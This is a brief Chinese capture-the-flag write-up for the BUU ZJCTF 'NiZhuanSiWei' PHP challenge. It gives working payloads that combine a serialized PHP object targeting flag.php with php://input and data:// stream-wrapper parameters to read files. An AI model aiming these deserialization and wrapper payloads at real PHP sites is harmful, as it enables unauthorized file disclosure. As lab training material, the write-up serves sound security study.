BUU-ZJCTF-php反序列化+伪协议

NiZhuanSiWei

打开环境，看到代码

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}  

最后的payload

text=php://input&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
如果用input，需要POST传参，如果用data代替input，可以GET传参
text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}